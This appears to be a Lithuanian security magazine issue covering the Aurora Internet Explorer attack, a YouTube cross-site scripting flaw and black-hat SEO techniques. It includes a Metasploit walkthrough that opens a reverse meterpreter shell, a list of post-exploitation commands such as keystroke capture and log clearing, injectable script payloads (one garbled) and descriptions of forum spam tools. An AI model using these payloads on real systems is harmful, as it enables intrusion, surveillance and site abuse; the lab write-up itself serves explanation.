Tinklaraštyje taip pat buvo skelbiama, kad daugiau

nei 20 kompanijų nukentėjo nuo šių atakų. Kiti

šaltiniai teigia, kad nuo šių atakų nukentėjo

daugiau nei 34 organizacijos.

Atakos analizė

Google teigia, kad šios atakos metu buvo pavogta

jos inteleaktualinė nuosavybė. Kibernetiniai

nusikaltėliai labiau domėjosi prieigos gavimu prie

Gmail vartotojų paskyrų, kurios priklausė Kinijos

disidentams. Pagal Financial Times, dvi Ai

Weiwei Gmail paskyros buvo nulaužtos, jų turinys

perskaitytas ir nukopijuotas. Tačiau, kibernetiniai

nusikaltėliai peržiūrėjo tik dviejų Gmail paskirų

duomenis – laiškų temas ir Gmail paskyrų

sukūrimo datas.

McAfee saugumo ekspertai ištyrė,

kad ši ataka buvo įvykdyta per iki šiol nežinoma

Internet Explorer 6 naršyklės pažeidžiamumą.

Pažeidžiamumas paveikia Windows 2k, XP, 2003,

2008, Vista ir Se7en operacines sistemas. Praėjus

savaitei po McAfee paskelbto pranešimo apie šį

pažeidžiamumą Microsoft kompanija pripažino,

kad apie šį pažeidžiamumą jau žinojo nuo 2009m.

rugsėjo mėnesio... Tad klausimas, kodėl Microsoft

neužkamšė šio pažeidžiamumo ?

Kai sistema užkrečiama „Aurora“ atakos metu

paskleistu virusu, tuomet sukuriamas atgalinių

durų ryšys (backdoor). Šiuo ryšiu susijungiama

tarp aukos kompiuterio ir Ilinojaus,

Teksaso ir Taivano valstybėse esančių serverių.

Tuomet užkrėsta mašina pradeda tyrinėti

apsaugota bendrovės intranetą ieškodami kitų

pažeidžiamų sistemų bei intelektualinės

nuosavybės. Kibernetiniai nusikaltėliai šią ataka

nutraukė Sausio 4 dieną, po to kai Ilinojaus,

Teksaso ir Taivano serveriai buvo išjungti. Nėra

žinoma ar šiuos serverius išjungė kibernetiniai

nusikaltėliai ar serverių administratoriai. Tačiau ši

ataka buvo atnaujinta 2010m. vasario mėnesį.

Pažeidžiamumo panaudojimas

Pabandykime pakartoti visą atakos eigą naudodami

metasploit`ą. Tiesa, šiek tiek baugu bus skaityti

kaip pažeidžiamumas dirba ir kaip lengvai

kibernetinis nusikaltėlis gali kontroliuoti

pažeidžiamą sistemą.

Naudojama programinė įranga:

Metasploit Framework;

2 tinklo VMware, Win XP SP2 atvaizdai

(image);

TCPView.

Įdiegiame metasploit į vieną iš VMware

atvaizdų, kuris yra kaip hakerio kontroliuojama

sistema, įdiegimas atliekamas šiomis komandomis:

msf > use exploit/windows/browser/ie_“Aurora“msf exploit(ie_“Aurora“) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ie_“Aurora“) > set LHOST 192.168.1.30LHOST => 192.168.1.30msf exploit(ie_“Aurora“) > set LPORT 6666LPORT => 6666msf exploit(ie_“Aurora“) > set URIPATH /URIPATH => /msf exploit(ie_“Aurora“) > Exploit

Atsakas, kuris parodo, kad serveris yra startavęs:[*] Exploit running as background job.msf exploit(ie_“Aurora“) >[*] Started reverse handler on port 6666[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.1.30:8080/ [*] Server started.

Kai pažeidžiamojoje sistemoje atidaroma

Internet Explorer interneto naršyklė ir įvedamas

serverio

IP adresas (mūsų atveju 192.168.1.30), tuomet

gaunamas atsakas:

[*] Sending Microsoft Internet Explorer "„Aurora“" Memory Corruption to client 192.168.1.57[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038) sessions -i 1[*] Starting interaction with

1... – komanda, kurios pagalba susijungiama su pažeista sistema.

Testuojant pažeistą sistemą

Jei pažeistoje sistemoje būtų tikrinami atviri

prievadai, būtų rasta išties įdomių dalykų. T. y.

būtų atrastas prievadas, kurį atidarė atgalinių durų

virusas.

Paveiksle matome atvira Internet Explorer

naršyklės prievadą, kuriuo naudojasi „Auroros“

atakos metu įveistas atgalinių durų virusas. Nėra

kito būdo kaip atpažinti ar sistema nulaužta ir

kontroliuojama iš nuotolinio serverio.

Kontroliuojant pažeistą sistemą

Komandos, kuriomis galima kontroliuoti pažeistą

sistemą:

? - Help menu

background - Backgrounds the current session

channel - Displays information about active

channels

close - Closes a channel

exit - Terminate the meterpreter session

help - Help menu

interact - Interacts with a channel

irb - Drop into irb scripting mode

migrate - Migrate the server to another process

quit - Terminate the meterpreter session

read - Reads data from a channel

run - Executes a meterpreter script

use - Load a one or more meterpreter extensions

write - Writes data to a channel

Stdapi tinklo komandos:

ipconfig - Display interfaces

portfwd - Forward a local port to a remote

service

Stdapi: vartotojo sąsajos komandos:

Enumdesktops - List all accessible desktops and

window stations

Idletime - Returns the number of seconds the

remote user has been idle

keyscan_dump - Dump they keystroke buffer

keyscan_start - Start capturing keystrokes

keyscan_stop - Stop capturing keystrokes

setdesktop - Move to a different workstation and

desktop

uictl - Control some of the user interfacecomponents

Stdapi: Failų sistemos komandos:

cat - Read the contents of a file to the screen

cd - Change directory

del - Delete the specified file

download - Download a file or directory

edit - Edit a file

getlwd - Print local working directory

getwd - Print working directory

lcd - Change local working directoryroute - View and modify the routing tablo

ls - List files

mkdir - Make directory

pwd - Print working directory

rm - Delete the specified file

rmdir - Remove directory

upload - Upload a file or directory

Stdapi: sistemos komandos:

clearev - Clear the event log

drop_token - Relinquishes any active

impersonation token.

execute - Execute a command

getpid - Get the current process identifier

getprivs - Get as many privileges as possible

getuid - Get the user that the server is running

kill - Terminate a process

lpwd - Print local working directory

ps - List running processes

reboot - Reboots the remote computer

reg - Modify and interact with the remote

registry

rev2self - Calls RevertToSelf() on the remote

machine

shell - Drop into a system command shell

shutdown - Shuts down the remote computer

steal_token - Attempts to steal an

impersonation token from the target process

sysinfo - Gets information about the remote

system.

Aukščiau pateikiau komandas, kurios gali

būti naudojamos norint kontroliuoti pažeistą

sistemą.

Pasaulis pasikeitė. Kiekvieną modelį dabar

reikia adaptuoti prie naujos realybės.

Administratoriai turi rūpintis visos įmonės

intelektualinės nuosavybės apsauga, privačių,

nefinansinių klientų informaciją.

Liepos mėnesio pradžioje youtube.com

tinklalapyje buvo atrastas XSS tipo

pažeidžiamumas. Išnaudojus šį pažeidžiamumą į

youtube.com tinklalapio komentarus galima įterpti

žalingą HTML kodą.

Panagrinėkime šį pažeidžiamumą iš arčiau.

Kad būtų galima į komentarų skiltį įterpti HTML

kalbą pirmiausia reikia „aktyvuoti“ HTML kalbą.

Tai atliekama komanda: <script>Pavyzdžiui:

<script><h1> aplankykite isauga.com – Šviesesnio rytojaus link <blink> <marquee><br> <br> Alone ’);”; </script>

Iššokantis (pop-up) reklaminis langas,

įterpiamas

pasinaudojus paprasta JavaScript kalbos komanda:

<script><BODY onLoad=”alert(‘aplankykite isauga.com - Alone’);”

jei norima nukreipti į kitą tinklalapį:<script>Zbody onLoad=”document.write(‘<script>window.location = String.fromCharCode(104,116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 115, 61, 165, 67, 61, 46, 63, 6f, 6d);</script>’);”;

Įterpus šį kodą į youtube.com tinklalapį, jis persiųs jus į www.isauga.com tinklalapį

Pradedame nuo pat pradžių. Kas yra SEO ?

Su kuo jis valgomas ir apskritai apie ką aš kalbėsiu

? Supažindinant skaitytojus su šiomis

technologijomis pateikiu šiek tiek sausos teorijos

kurią galite rasti paprasčiausioje Wikipedijoje. O

tie, kurie žino, kas yra SEO ir kuo skiriasi white-

hat SEO nuo black-hat SEO siūlyčiau praleisti šio

straipsnio dalį ir skaityti toliau.

Optimizavimas paieškos sistemoms (angl.

Search Engine Optimization, trump. SEO) -

Interneto tinklapių projektavimo metodologija,

siekiant aukščiausių tinklalapio pozicijų paieškos

sistemų rezultatuose. Dažnu atveju SEO yra

klaidingai tapatinamas su marketingu paieškos

sistemose (angl. Search Engine Marketing, trump.

SEM). Populiariausias ir daugeliui žinomas SEM

įrankis yra Google "AdWords". SEO skirstomas į

du tipus: leidžiamas paieškos sistemų bei

draudžiamas (angl. white-hat SEO bei black-hat

SEO).

Naudojant nelegalius tinklalapio optimizavimo

paieškos sistemoms būdus, svetainė anksčiau ar

vėliau bus pašalinta iš paieškos sistemų rezultatų

puslapių (angl. Search Engine Result Page, trump.

SERP). Blackhat metodai

dažniausiai yra naudojami interneto sukčių,

kibernetinių nusikaltėlių bei kitų piktavalių.

SEO faktorių, lemiančių tinklalapio pozicijas

paieškos sistemose, 2009 metais buvo daugiau

kaip 200.

Sistemų algoritmai nėra viešinami, siekiant

išvengti manipuliavimo jais.

Išskiriamos dvi SEO dalys - vidinis SEO bei

išorinis SEO. Vidinio SEO metu svetainėje

atliekami techniniai tinklapio optimizavimo darbai,

todėl paieškos sistemos lengviau analizuoja ir

suvokia svetainėje esantį turinį.

Išorinio SEO metu dažniausia stengiamasi į

svetainę pritraukti kuo daugiau nuorodų pagal tam

tikrus kriterijus. (straipsnis iš Wikipedijos: Aut.

Pstb.) .

Išsamiai apie Black Hat SEO

Black Hat paieškos sistemų optimizavimas

paprastai apibrėžiamas nelegaliais metodais, kurie

naudojami norint paieškos sistemoje gauti

tinklalapio aukštesnio lygio reitingą. Naudojant šį

metodą dažniausia apimamos šios technikos:

Laužomos paieškos sistemų taisyklės bei

reglamentai;

Neetiškai pateikiamas tinklalapio turinys.

Dažniausiai vizualiu (matomu) ar nevizualiu

(nematomu) metodu tiek paieškos vorams,

tiek paieškos sistemų naudotojams.

Naudojantis Black Hat SEO galite gauti

nebent tik trumpalaikės naudos, tačiau jei jūs šia

technika naudositės savo tinklalapyje ir platinsite

šlamštą,

tuomet iš paieškos sistemų robotų galite susilaukti

griežtos bausmės. O jie, patikėkite, tikrai nesigaili.

Paslėptas turinys

Viena iš labiausiai naudojamų black Hat

SEO technikų yra turinio slėpimas. Paslėptas

tinklalapio turinys būna įvairias pavidalais, tačiau

pats pagrindinis

<noscript>Imaginary Car Hire Firm do Car Hire which is very affordable so if you want to hire a carcall our car hire firm because we are the best car hire firm in the world</noscript>

principas yra tai, kad per paslėptą turinį

svetainėje prikišama įvairiausių žodžių, kurių

vartotojai nemato, tačiau suindeksuoja paieškos

sistemų robotukai.

Paslėpti turinį galima naudojant

komentavimo tagus (gaires). Komentavimo tagai

atrodo maždaug taip:

<!-- komentavimo tegas --> , arba // komentavimo tegas .Jei norima paimti ne vieną eilutę:

/* komentavimo tegas komentavimo tegas komentavimo tegas */

Realiai, komentavimo tagai yra skirti

programuotojams pažymėti tam tikrą kodo dalį.

Teisingai naudojami komentavimo tagai: <!–Pagrindinio turinio pradžia –>. O taip

komentavimo tagai naudojami nekorektiškai: <!—Search engine optimisation, SEO,professional search engine optimisationcompany, spamming search enginės, Viagra,porn, shop –>

Kitas populiarus būdas paslėpti tam tikrą turinį tai

naudoti <noscript> tagą. Iš tiesų šis tagas tūrėtų

būti naudojamas norint informuoti vartotojus, kad

tam tikras scenarijus (skriptas) yra naudojamas,

bet jų interneto naršyklė nepalaiko šio scenarijaus.

Kad padidintų svetainės lankomumą bei

populiarumą kibernetiniai nusikaltėliai šį tagą

naudoja kaip viena iš šlamšto technikų,.

Teisingai naudojamo <noscript> tago pavyzdys:<script type=”text/javascript”><!–document.write(“Hello World!”)//–></script><noscript>Jūsų interneto naršyklė nepalaiko JavaScript!</noscript>

Neteisingai naudojamo <noscipt> pavyzdys:

<noscript>Imaginary Car Hire Firm do Car Hire which is very affordable so if you want to hire a carcall our car hire firm because we are the best car hire firm in the world</noscript>

Taip pat gali būti naudojami kiti HTML kalbos

tagai: <input type=”hidden”> , <noframes>Neverta apsiriboti vien tik HTML kalba,

dar galima naudoti ir CSS - pakopinio stiliaus

kalbos tagus. Slepiamas tekstas, kuris turi lygiai

tokia pačia spalvą kaip ir tinklalapio fonas, arba

naudojamos labai mažos raidės, kurių naudotojas

nepamato. Pavyzdžiui, raudonu šriftu užrašytas

tekstas nėra matomas raudoname tinklalapio fone,

arba naudojamos vos 1 mm. Raidės kurių

naudotojas paprastai neįžiūri, tačiau tiek parašytas

tekstas turintis tą pačia spalvą, tiek labai mažas

tekstas yra naudojamas tinklalapyje ir

suindeksuojamas paieškos robotų.

Jei netyčia, ar to nežinant naudojatės tokiomis

technikomis siūlyčiau kuo greičiau jų atsisakyti,

nes jūsų tinklalapis gali būti užblokuojamas

paieškos sistemų.

Meta raktažodžiai

Meta dalies raktažodžiai (keywords) tūrėtų

būti trumpas žodžių sąrašas, kuris tūrėtų atspindėti

tinklalapio temą. Turėtumėte nepiktnaudžiauti

meta raktažodžiais, nes paieškos sistemos jau

„išmoko“ patikrinti juos.

Taisyklingai naudojami raktažodžiai:<meta name=”Keywords” content=”Online marketing, digital marketing, searchmarketing, search engine marketing, e-mail marketing, SEO” />

Netaisyklingai naudojami raktažodžiai:<meta name=”keywords” content=” Restaurant, restaurants, food, feed, take away food, fastfood,junk food, eat, eating out, dinner, dining, meal, eating, MadeUp, steak and chips,chicken and chips, pie and chips, pudding, desert, big restaurant,small restaurant, bestrestaurant, great restaurant, exclusive restaurant, cocktails, wine,drink, pizza,sandwhiches ”>

Meta raktažodžių užkimšimas

Pagrinde yra du meta tagai, kuriais

naudojamasi informuoti paieškos sistemas, koks

tinklalapio turinys pateikiamas. Šie tagai yra tarp

tinklalapio <head></head> dalių.

Ir kai netinkamai būna aprašyti raktažodžiai,

paieškos robotukai perspėja savo paieškos

sistemas, kad tas tinklalapis naudoja neleistina

SEO techniką. Meta taguose tūrėtų būti aprašyta

tai, kas pateikiama tinklalapio turinyje, ne daugiau

nei 1 ar 2 sakiniai.

Taisyklingas meta aprašymas:

<meta name=”description” content=”PushON are an Online Marketing agency providing a fullrange of digital marketing services throughout Greater Manchester and the North West UK.If you need Search Enginemarketing (SEM), Search Engine Optimisation (SEO) or Pay per Click (PPC), we can helpyou. Contact us now.” />

Netaisyklingas meta aprašymas:<meta name=”description” content=”MadeUp restaurant website is the best MadeUp restaurantwebsite, our restaurant is better than any restaurant,great restaurant,best foodrestaurant,visit our restaurant” />

Įšėjimo bei atėjimo puslapiai

Tokio tipo puslapiai dažniausiai yra sukurti tik

paieškos sistemoms, ne tinklalapio skaitytojams. Iš

tiesų tai netikri, suklastoti puslapiai, kuriuose

prikemšama ir naudojama aukšto reitingo vienas

ar du raktažodžiai kurie atveda į šį tinklalapį.

Tinklalapio lankytojai niekada nepamatys šio

puslapio, nes naudotojas užėjęs į šį tinklalapio

puslapį automatiškai persiunčiamas į kitą

tinklalapį, be galimybės jį pamatyti.

Nuorodų fermos

Nuorodų fermos tai visiems prieinami, nemokami

tinklalapiai (Free For All [FFA]), kurie neturi

pagrindinio tikslo, kaip tik teikti nuorodas į kitus

tinklalapius. Jie nesuteikia jums kažkokio

papildomo srauto. Talpindami nuorodas tokiuose

tinklalapiuose rizikuojate, kad jūsų tinklalapis gali

būti išmestas iš paieškos sistemų. Neretai, SEO

optimizavimu užsiimančios įmonės, kurios nežino

apie ką kalba, naudoja specialias SEO

optimizacijos programas, kurios skatina tokių

puslapių kūrimą. Paieškos vorai jau sugeba

atpažinti tokius tinklalapio puslapius ir geba juos

ignoruoti, arba dar blogiau, gali jūsų tinklalapį

pažymėti netinkamu ir užblokuoti jį paieškos

sistemoms.

Įrankiai

Daugelis, užsiimančių Black Hat SEO

technikomis stengiasi nesitepti rankų ir visą darbą

paversti į automatizuotą sistemą, būtent tam ir yra

naudojamos specialios programos, kurios už juos

atlieka visus darbus. Viena iš tokių programų tai

Xrumer. Šios programos dėka iš forumų,

tinklaraščių, ir svečių knygų į savo tinklalapį galite

gauti tūkstančius atgalinių nuorodų. Šių nuorodų

dėka tinklalapio puslapiavimo reitingas ženkliai

šokteli aukštyn.

Xrumer programa geba išplatinti norimą tinklalapį

per 100.000 forumų, tinklaraščių ar svečių knygų,

kiekvienoje iš jų palikdamas po nuorodą .

Trumpas apibrėžimas – Xrumer tai profesionali,

aukštos kokybės programa, kuri geba automatiškai

sudaryti nuorodas. Vos per kelias dienas norimas

tinklalapis šoktels Google reitinguose į topus.

Šis įrankis mėgstamas tiek naujokų, tiek

profesionalų todėl, kad Xrumer yra labai galinga

bei efektyvi programa. Tačiau čia pasakos ir

pasibaigia, nes programa kainuoja 540$. Žinoma

juodųjų skrybelių hakeriai ją, įvairiuose P2P tipo

tinkluose, randa „nulaužtą“, tačiau neverta

susigundyti lengvu grobiu, nes 90% P2P tinkluose

esančių programų kurių pavadinimai - Xrumer yra

ne kas kita kaip Trojos arkliai bei kiti virusai

(išbandyta!).

Ką siūlo programa:

Šimtu tūkstančių nuorodų į tinklalapį.;

Automatizuotą SEO darbą.;

Greita pakilimą paieškos sistemose;

Aukštą tinklalapio reitingavimą.

Dar daugiau, ji turi begalę kitų nustatymų:

Links counter – Pasirinkus norimą

duomenų bazę iš Links aplankalo, gali suskaičiuoti

kiek nuorodų yra faile / duomenų bazėje.

Links post-processing. Geba sutvarkyti nuorodas

esančias duomenų bazėje. T. y iš

http://link.com/index.php? Paverčia į

http://link.com/index.php .

Delete duplicated links – Jau pats

pavadinimas pasako. Ištrina pasikartojančias

nuorodas esančia duomenų bazėje.

Links database analysis – Tai labai

galingas ir naudingas įrankis. Jis tikrina žinutes,

kurias pavyko įterpti į forumus, ir stebi kiek šių

žinučių ištrynė forumų moderatoriai.

Graphics reports – Šis įrankis leidžia grafiškai

atvaizduoti forumuose, tinklaraščiuose, svečių

knygose sėkmingai patalpintas žinutes.

Taip pat geba procentaliai atvaizduoti tas

žinutes, kurios dar laukia patvirtinimo bei domenų

zonas, forumų naudojamas sistemas bei svečių

knygas. Ataskaitos pateikiamos grafiniu arba

diagramų būdu.

Be visų aukščiau išvardintų savybių, taip pat

galima programą susikonfigūruoti taip, kad ji

siųstų reklamines žinutes per proxy prievadus,

apeiti grafines captcha apsaugas. Numatyta

galimybė tik užsiregistruoti forumuose ir nesiųsti

jokių reklaminių žinučių arba atvirkščiai,

užsiregistruoti ir patalpinti žinutes, netgi galimybė

forumuose užsidėti savo norimą avatarą nors ne

itin naudinga savybė, tačiau vis tiek įdomu kad

tokia savybė teikiama.

Kita, ne mažiau menkesnė, o gal net

geresnė programa tai - SEO Power Suite. Tiksliau

tai programa susidedantį iš keturių kitų

paprogramų:

LinkAssistant;

Rank Tracker;

SEO SpyGlass;

WebSite Auditor.

SEO Power Suite turi tiek mokamą, tiek

nemokamą versija.

Nemokamoje versijoje apkarpytos kai

kurios funkcijos, kurios jums neleis sklandžiai

dirbti, tačiau nereikia norėti, kad viskas būtų

pateikiama ant lėkštutės.

Apie kiekvieną paprogramę konkrečiai.

LinkAssistant – Tai labai įdomus įrankis,

kuris pagal norimą užklausą geba atrasti

tinklalapio partnerius ir pateikti partnerių kontaktų

detales.

LinkAssistant geba atrasti aukšto reitingavimo

tinklalapius panašius į jūsų, ir juose iškapstyti

susisiekimo detales t. y. elektroninį paštą.

Galimybė pačiam sugeneruoti nuorodų direktorijų

kategorijas bei subkategorijas, bei jas įkelti į

tinklalapį. Įdomiausia yra tai, kad susisiekti su kito

tinklalapio savininku galima tiesiai iš programos,

nes ji turi ne tik elektroninio pašto dėžutę, bet ir

interneto naršyklę... LinkAssistant programa

suteikia galimybę stebėti nuorodų populiarumą.

Tiesa sakant, naudodamas šia programa užmiršau

apie kitus FTP klientus.

Rank Tracker – Tai programa kuri gali būti labai

naudinga, jei norite automatiškai tikrinti

tinklalapio reitingavimą bei stebėti tinklalapio

poziciją paieškos sistemoje,

Rank Tracker turi papildomą įskiepį (komponentą)

kuris padeda „pasiūlyti“ geresnius raktažodžius.

Tiesa sakant ,šioje paprogramoje yra net 11

skirtingų raktažodžių, siūlymo įrankių. Rank

Tracker Palaiko 663 paieškos sistemas. Dar

daugiau, programa suteikia galimybę stebėti

norimo tinklalapio reitingavimą. Galimybė

parodyti geriausius raktažodžius, kurie

optimizuotų tinklalapį.

T. y. programa paima raktažodžius su kuriais

daugiausiai ieškoma paieškos sistemose ir pagal

jūsų tinklalapio esmę pasiūlo geresnius

raktažodžius

SEO Spy Glass – Tai programa, kuri gali šnipinėti

tinklalapio atgalines nuorodas, bei gauti detalesne

informacija apie paliktas nuorodas. Šis įrankis

geba išanalizuoti nuorodas 428 vietinėse ir

pasaulinėse paieškos sistemose.

Geba atspausdinti atgalinių nuorodų sąrašą bei gali

išsiųsti elektroniniu paštu ar publikuoti internete.

Tai labai naudingas įrankis stebėti atgalinių

nuorodų ryšiams bei nustatyti kurie tinklalapiai

gerai reitinguojami, o kuris ne taip gerai.

Paskutinę ir tikrai neprasčiausia programa tai

WebSite Auditor.Šios programos dėka galima

lengvai optimizuoti viso tinklalapio turinį ir jį

„patraukliai“ pritaikyti paieškos sistemoms. Tai

vienintelė programa kuri leidžia optimizuoti

tinklalapį dviem lygiais – pačio tinklalapio

(domeno) ir puslapių (turinio). Optimizuojant šiais

dviem metodais norimas tinklalapis greitai atsidurs

paieškos sistemos pirmuosiuose puslapiuose.

Konkrečiau kalbant, atsižvelgiant į įvairius SEO

faktorius šis įrankis geba viename lange

išanalizuoti visą tinklalapį, pateikiant visus

surinktus duomenis.

WebSite Auditor gali padėti atrasti bei

pataisyti:

Neveiksmingas nuorodas;

HTML kodo klaidas;

Dubliuotą turinį;

404 ir kitų serverių atsako klaidas;

Ne indeksuotus tinklalapio

puslapius;

Prarastus ar per ilgus meta

aprašymus;

Bei kitus faktorius kurie gali įtakoti tinklalapio

reitingavimą.

Šiam kartui tiek.

Pageidavimus, pastabas, siūlymus galite siųsti

nurodytu el. paštu.

Dėl reklamos visi klausimai derinami el. paštu arba

skype programa.

KITO NUMERIO TEMOS

20 Windows slaptų triukų, kurių neperskaitysite niekur kitur;

Ar Google XXI amžiaus priešas ?

Laužimai pasitelkiant Google sistemą, ką Googlegali išduoti apie jus ?